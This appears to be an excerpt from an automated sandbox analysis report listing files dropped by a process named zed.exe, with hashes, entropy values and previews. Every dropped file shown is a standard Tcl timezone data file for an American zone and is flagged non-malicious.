                                                                                                                                                                                                                                            SHA-512:F78853AA75F58A85555DD79E08A7487E5161854650DBF480189790D855738FEDCBDA936870067DE40FE000861008A9E9AAF61DF02B6B30B96038C61B5E1F1C1D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santarem) {.. {-9223372036854775808 -13128 0 LMT}.. {-1767212472 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8871
                                                                                                                                                                                                                                            Entropy (8bit):3.5351636359890537
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2Xv/lxUQjzoMUBI0nuUoDK6lPlgiot7JC/k8NWse4r4g5xCEmMQUs8nCxvisEbzu:2fD9TzDC9g32+E
                                                                                                                                                                                                                                            MD5:81FC6AFF68B1CF2EA57ED13A42B35BE1
                                                                                                                                                                                                                                            SHA1:5889E502FBDCBCDFE9E7053625FFFBAD61FFE256
                                                                                                                                                                                                                                            SHA-256:77CED11337F43241D57C10BA752C7104A7AF8727992E7B90A3C5D62AA15E81C7
                                                                                                                                                                                                                                            SHA-512:7756CBAF76966F3D45883B725B791A8DD60E8329F6FE19C12029C6FEBC90D7322765A0A8BA26FC586443A902B372D0C0189426A8F99B2B535BB8F1EE74796B44
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santiago) {.. {-9223372036854775808 -16965 0 LMT}.. {-2524504635 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-740520000 -10800 1 -03}.. {-736635600 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):616
                                                                                                                                                                                                                                            Entropy (8bit):4.330655351784895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290/StmdHhvCvuCY/h/uFkS/5MVvMrW//MVvMrpx/m0XVvMr4UB/47VvMr/d:5+seQvuCY5/u/REfk+xxdbUBQpu652GO
                                                                                                                                                                                                                                            MD5:FAD0621010889164ADC4472003C9391F
                                                                                                                                                                                                                                            SHA1:C4EE0B8D6925338D17D5745DE9D45FA3C628DFC5
                                                                                                                                                                                                                                            SHA-256:2217E72B11A90F2D679C175DE3CC0F2FED4C280C9FF9707CFFAF118BF9A06A4B
                                                                                                                                                                                                                                            SHA-512:90E8E5A109CD72458C7796CF0324F63E543CCD63D13A09A3DD28EDC8B2793C964C18E79FDF0C5067C5A481B7FB03E8413139C32F59DA07E9D7893378ABBBD2B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santo_Domingo) {.. {-9223372036854775808 -16776 0 LMT}.. {-2524504824 -16800 0 SDMT}.. {-1159773600 -18000 0 EST}.. {-100119600 -14400 1 EDT}.. {-89668800 -18000 0 EST}.. {-5770800 -16200 1 -0430}.. {4422600 -18000 0 EST}.. {25678800 -16200 1 -0430}.. {33193800 -18000 0 EST}.. {57733200 -16200 1 -0430}.. {64816200 -18000 0 EST}.. {89182800 -16200 1 -0430}.. {96438600 -18000 0 EST}.. {120632400 -16200 1 -0430}.. {127974600 -18000 0 EST}.. {152082000 -14400 0 AST}.. {975823200 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2900
                                                                                                                                                                                                                                            Entropy (8bit):3.6548008349990755
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5uFChlvEwR9xSSx5H4a8tf3fku+da2XUd23t8VZDG8+w/ghBPWTRz908a9zRgwun:cFIlvEwZSSxdF8tfMu+da2kdCt8VZy8n
                                                                                                                                                                                                                                            MD5:F6B732A862659EB131C2E6FEC00E9734
                                                                                                                                                                                                                                            SHA1:49517DF63BC5B6FEC875CE9477BBF84F4072FA31
                                                                                                                                                                                                                                            SHA-256:0E7BA1C5A3FA3DABDAA226BFE1E8D797A3835EA554828881AB5E365EDA09B92E
                                                                                                                                                                                                                                            SHA-512:670A5B604B5EA0F5FA15083BC1EA115B7EFD449F9EAC4518E109493591893DD3627AFC6628E0EDD1953E932E2A7AD9B5A379526548677158EC445366E4ED7166
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sao_Paulo) {.. {-9223372036854775808 -11188 0 LMT}.. {-1767214412 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-195429600 -7200 1 -02}.. {-189381600 -7200 0 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6839
                                                                                                                                                                                                                                            Entropy (8bit):3.565857684485945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:9OgtbdF7TI7nYUYXg9W/OAcv7vuShytWi0PnvLrqPoKR2XszXckXtogYN4Ezlk0X:PJr9Q7TMq+ML
                                                                                                                                                                                                                                            MD5:D1BF579FE8123E8EE9248A51E794CC78
                                                                                                                                                                                                                                            SHA1:BF9CB9BED143C7529719E0C1E2F88BE1AC9F8DD4
                                                                                                                                                                                                                                            SHA-256:158BD9E4EB0B9DFF3F2D3E2DBA72F217B73423012DD33A688FD57852124E884A
                                                                                                                                                                                                                                            SHA-512:78192AC38912021F848592D0B208CB122EFFC6DDB326540FFAADA4FD3322B7A442FD1116F408D64B8788520B46545DFAE571EA42046D62A282A97ECCD5663655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Scoresbysund) {.. {-9223372036854775808 -5272 0 LMT}.. {-1686090728 -7200 0 -02}.. {323841600 -3600 0 -01}.. {338961600 -7200 0 -02}.. {354679200 0 0 +00}.. {370400400 -3600 0 -01}.. {386125200 0 1 +00}.. {401850000 -3600 0 -01}.. {417574800 0 1 +00}.. {433299600 -3600 0 -01}.. {449024400 0 1 +00}.. {465354000 -3600 0 -01}.. {481078800 0 1 +00}.. {496803600 -3600 0 -01}.. {512528400 0 1 +00}.. {528253200 -3600 0 -01}.. {543978000 0 1 +00}.. {559702800 -3600 0 -01}.. {575427600 0 1 +00}.. {591152400 -3600 0 -01}.. {606877200 0 1 +00}.. {622602000 -3600 0 -01}.. {638326800 0 1 +00}.. {654656400 -3600 0 -01}.. {670381200 0 1 +00}.. {686106000 -3600 0 -01}.. {701830800 0 1 +00}.. {717555600 -3600 0 -01}.. {733280400 0 1 +00}.. {749005200 -3600 0 -01}.. {764730000 0 1 +00}.. {780454800 -3600 0 -01}.. {796179600 0 1 +00}.. {8
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.888573146674231
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/2IAcGEtOFBx+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/290tO09Z
                                                                                                                                                                                                                                            MD5:2FF74846ADF32AA3A9418376775B7F25
                                                                                                                                                                                                                                            SHA1:130D7548DFFEBCE74969962E335B40299D7C5C54
                                                                                                                                                                                                                                            SHA-256:BF4FAB3AE72CC7FA4F9E34CF0551A85C54A084CD826DF5D9CC684DE6188E84DB
                                                                                                                                                                                                                                            SHA-512:9E52C017E595EEF1C68C8A1943416A9109D7DB4C32D25F83D05213C4200869A50E2E726894E39ECA364C558BB7F5566F6150CEA5D3CB14D1DEAE28C3D8C810E0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:America/Shiprock) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8651
                                                                                                                                                                                                                                            Entropy (8bit):3.959337076866423
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:IGCG0hPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:I5G0A9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:7CCB6902749079A0496F1E2E2137448E
                                                                                                                                                                                                                                            SHA1:3D0ED7BF1C26659F6794E26AE3869F8AB925B6DF
                                                                                                                                                                                                                                            SHA-256:ABB08435CAE80119068A85984BFFE9C1596F4FB90F07CC01124C907E5162C189
                                                                                                                                                                                                                                            SHA-512:0B5B2DCECC70F357DB6D590AB63E600C572EA6B3F430565EFEB29777B1901AAC55CACC7495C668F739201076B180402141BC1B2ED2357E9B4DFBABF3B122AB44
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sitka) {.. {-9223372036854775808 53927 0 LMT}.. {-3225223727 -32473 0 LMT}.. {-2188954727 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {3099492
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                                            Entropy (8bit):4.932842207797733
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290txP90ppv:MByMYbpwt2907P90b
                                                                                                                                                                                                                                            MD5:CBFA61DBF6F7459CF8D517402B29998E
                                                                                                                                                                                                                                            SHA1:A562B29C9470DBD25480966B0462433124BA4164
                                                                                                                                                                                                                                            SHA-256:353CDBD46BA8C7472A93E9E800A69105801F6784B22EC50A59294CDC3BE40E18
                                                                                                                                                                                                                                            SHA-512:00B333EAA2C32EDDA8F06457AD0E10013A0147B20F504F4F1096656F731A7C1896D5ABD83E7EDBD5D4E7DA587EE9BFA796539EB1E9F4056D75D1FDF203251150
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Barthelemy) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11289
                                                                                                                                                                                                                                            Entropy (8bit):3.8713946894934614
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:PmxVjd1cO8f7/EjUhSicN6zvfwb+8YbTE0M0J:PmrcOI7/EjiskY01J
                                                                                                                                                                                                                                            MD5:8F068899DA75663128320633E1881333
                                                                                                                                                                                                                                            SHA1:E9161B45D7B11A2DD6E9679AC080E84EC51561E3
                                                                                                                                                                                                                                            SHA-256:E2917204B0C843C32051BB371CF6D0AD272C02720B9C0D913AC072C8ABE1EC64
                                                                                                                                                                                                                                            SHA-512:2200E9B9D816157330ADAEA7383635876E5A37329B1AF9613D38BCFBE8143835837A25132A94E44A61DB8058ED98B1A33F295EA64BC1F4CE30966D52BB0B673D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/St_Johns) {.. {-9223372036854775808 -12652 0 LMT}.. {-2713897748 -12652 0 NST}.. {-1664130548 -9052 1 NDT}.. {-1650137348 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1598650148 -9052 1 NDT}.. {-1590100148 -12652 0 NST}.. {-1567286948 -9052 1 NDT}.. {-1551565748 -12652 0 NST}.. {-1535837348 -9052 1 NDT}.. {-1520116148 -12652 0 NST}.. {-1503782948 -9052 1 NDT}.. {-1488666548 -12652 0 NST}.. {-1472333348 -9052 1 NDT}.. {-1457216948 -12652 0 NST}.. {-1440883748 -9052 1 NDT}.. {-1425767348 -12652 0 NST}.. {-1409434148 -9052 1 NDT}.. {-1394317748 -12652 0 NST}.. {-1377984548 -9052 1 NDT}.. {-1362263348 -12652 0 NST}.. {-1346534948 -9052 1 NDT}.. {-1330813748 -12652 0 NST}.. {-1314480548 -9052 1 NDT}.. {-1299364148 -12652 0 NST}.. {-1283030948 -9052 1 ND
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.907031043022691
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tMp490ppv:MByMYbpwt290g490b
                                                                                                                                                                                                                                            MD5:D521F2D9B28C5374FC3BD540C6B6F40D
                                                                                                                                                                                                                                            SHA1:39A3D86CB71F742F33B02F50B316638815B3CD4E
                                                                                                                                                                                                                                            SHA-256:EDB9457A7C64E47062BDC6458FD3BCFCD6C37820F1A2BC89DFE99ED77355011F
                                                                                                                                                                                                                                            SHA-512:05C1BE92550A962904ED3BB7DECCAC16FCB54D258F24F2AEDF755FCC44E4FEF5F86AB663945809F5D7AFA64178E807BBDAE77048270ED516DFF2C7720A746D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Kitts) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.9037013606484905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tY90ppv:MByMYbpwt290a90b
                                                                                                                                                                                                                                            MD5:9392E5A7BD198B0308F9271E4C7E59B2
                                                                                                                                                                                                                                            SHA1:A902440920A0318BC930957C74804A9A51EF7818
                                                                                                                                                                                                                                            SHA-256:6727A509BB937CB3446D41B57826DE70C7028E96F088AB5B7F803BEAA18279E8
                                                                                                                                                                                                                                            SHA-512:6DA1EAC390E72905DF1A14D82362B499D20FAD6D85F3DF116AE01E566D5D19C6D16E56DA72C458BB6143345EF45F35A53B245488C641D80BFBA200B16A59719E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Lucia) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):203
                                                                                                                                                                                                                                            Entropy (8bit):4.919272465019375
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tXIMFJ490ppv:MByMYbpwt290tJ490b
                                                                                                                                                                                                                                            MD5:49D0C8DAFCA053C9967EDCC4C0A484B1
                                                                                                                                                                                                                                            SHA1:7B4999D4B9AD93306BD411DF2946D741EC597770
                                                                                                                                                                                                                                            SHA-256:974AEED3D79124B50265C83D84F23CBE4F0328D00C75F42DD3ABC5D4C0A78DE1
                                                                                                                                                                                                                                            SHA-512:378E3657B26C5A039FF82ECCAC7797FF45CBC6479596629B3048164EE4E035F4ECFC557AA9EAF6848E78999B4FF8C63E53C7163BDF6F626ED6111004490D6F80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Thomas) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.909053768717241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tzb+Q90ppv:MByMYbpwt290xyQ90b
                                                                                                                                                                                                                                            MD5:6CFB23E7164605CDE380FB7C4D88DF11
                                                                                                                                                                                                                                            SHA1:CC513B29AD7B59E600DBCBC97927EB632558F657
                                                                                                                                                                                                                                            SHA-256:6B19404D295964EF66F47802836BB728FCE8E6481115797C0B5F200C354D7C8A
                                                                                                                                                                                                                                            SHA-512:728987D0925B6E12E8A220920BEDF94180880E78F3F08F6AC740E6304B22D446846068CEA499F61E7032ADB2E700CE31954921D478C9A8B6CB599E05A6292EA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Vincent) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):874
                                                                                                                                                                                                                                            Entropy (8bit):4.253846650171654
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290hEbmdHLCvYX4Q19xRv0+RmwPj+uLkQOzL3+ORL4FXgenM7RSslKA1PyKp:5zeOvT4xuyqoYaAxt7l
                                                                                                                                                                                                                                            MD5:C91F801CC5E9F78B966D1DF2259C38A8
                                                                                                                                                                                                                                            SHA1:D29C970CBFC74684D46AAAD543B73B520775632C
                                                                                                                                                                                                                                            SHA-256:939B25C9412B9E25D73F552E87826999FC8C929770E66491D1E4530046D3E758
                                                                                                                                                                                                                                            SHA-512:093378E61DE9310F9C48170CBB0FDBD3C79E184DA1489F759B20BCE410006A9D5A793C82E79A46E0AFF0DAA47D9DBAFD605959E491BA9ED4E55D26F293642D32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Swift_Current) {.. {-9223372036854775808 -25880 0 LMT}.. {-2030201320 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-747241200 -21600 0 MDT}.. {-732729600 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {-684342000 -21600 1 MDT}.. {-671040000 -25200 0 MST}.. {-652892400 -21600 1 MDT}.. {-639590400 -25200 0 MST}.. {-631126800 -25200 0 MST}.. {-400086000 -21600 1 MDT}.. {-384364800 -25200 0 MST}.. {-337186800 -21600 1 MDT}.. {-321465600 -25200 0 MST}.. {-305737200 -21600 1 MDT}.. {-292435200 -25200 0 MST}.. {-273682800 -21600 1 MDT}.. {-260985600 -25200 0 MST}.. {73472400 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):341
                                                                                                                                                                                                                                            Entropy (8bit):4.638828647226646
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2903fDm2OHskeoHxbV1ULhgdrV/uF+IcmJ3/uF+ivi9/uF+SNv:MB862903LmdHsVCn1ULSB/uF+QV/uF+q
                                                                                                                                                                                                                                            MD5:4C4034ABAB9E4804CCB23E51694044C9
                                                                                                                                                                                                                                            SHA1:7DB24CE83AB2C07E6F6784D27C4E3AC0F149D080
                                                                                                                                                                                                                                            SHA-256:1F0503579B0DDDBAF88814A278127D9CD7019EDD3C35F4CBFC0EF11C0EDAFE5B
                                                                                                                                                                                                                                            SHA-512:0BC366CD3AB2E1388D11770DC8DEC1FC94C48FDC846ABB6C487828BF9FF15CD9A1C15B33E08F6E48B7F4A6F2AD1617FF12B359784CA4C32256D72422E6825105
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tegucigalpa) {.. {-9223372036854775808 -20932 0 LMT}.. {-1538503868 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}.. {1146981600 -18000 1 CDT}.. {1154926800 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6890
                                                                                                                                                                                                                                            Entropy (8bit):3.8331465442823704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mJInJuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/Bm6BTd69xK7KjhVbHyR3h1gOZM:miFCC
                                                                                                                                                                                                                                            MD5:D93B62D5F7EEBC28AC047BED2307CAE8
                                                                                                                                                                                                                                            SHA1:8B3E02240A01B5AA42D30E86005E880916432227
                                                                                                                                                                                                                                            SHA-256:7FB0CBB101D3B6FBB6B9DAD5446BBF9E6AEC65EC38472739E604F68F6AA9AB7B
                                                                                                                                                                                                                                            SHA-512:3648106F4DF84CFD94AAD4E9430F8D3BBCB38A9196DE9A59246DFBBC170FADBF106DD1FD08FE2E4F7319BFFB1C2607E4F5D563C222CED8267483D1A0C388CCE5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Thule) {.. {-9223372036854775808 -16508 0 LMT}.. {-1686079492 -14400 0 AST}.. {670399200 -10800 1 ADT}.. {686120400 -14400 0 AST}.. {701848800 -10800 1 ADT}.. {717570000 -14400 0 AST}.. {733903200 -10800 1 ADT}.. {752043600 -14400 0 AST}.. {765352800 -10800 1 ADT}.. {783493200 -14400 0 AST}.. {796802400 -10800 1 ADT}.. {814942800 -14400 0 AST}.. {828856800 -10800 1 ADT}.. {846392400 -14400 0 AST}.. {860306400 -10800 1 ADT}.. {877842000 -14400 0 AST}.. {891756000 -10800 1 ADT}.. {909291600 -14400 0 AST}.. {923205600 -10800 1 ADT}.. {941346000 -14400 0 AST}.. {954655200 -10800 1 ADT}.. {972795600 -14400 0 AST}.. {986104800 -10800 1 ADT}.. {1004245200 -14400 0 AST}.. {1018159200 -10800 1 ADT}.. {1035694800 -14400 0 AST}.. {1049608800 -10800 1 ADT}.. {1067144400 -14400 0 AST}.. {1081058400 -10800 1 ADT}.. {1099198800 -14400 0 AST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.838326820531248
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7RQtHAIgpRQPN/2903MA90RQk:MByMYzp4t2903MA90D
                                                                                                                                                                                                                                            MD5:D68B69B05D8743977BA4815B8AFE8E92
                                                                                                                                                                                                                                            SHA1:364796989B6DD0110F1D85A8844419EB49772EC0
                                                                                                                                                                                                                                            SHA-256:845101F85A6DAF9DEB58A075473F9E541A0B68461677779B1461DE59E3FA3D18
                                                                                                                                                                                                                                            SHA-512:DEAA60DDF1521C269D7D386A7FCC40C8FAFB00EEA6764E6B23F4C65B8F6F596B3D5D2D3F6F7B1C22016C530B8789839F8052FDE1C2794C9F9C700C46DC8A3AEE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Thunder_Bay) $TZData(:America/Toronto)..
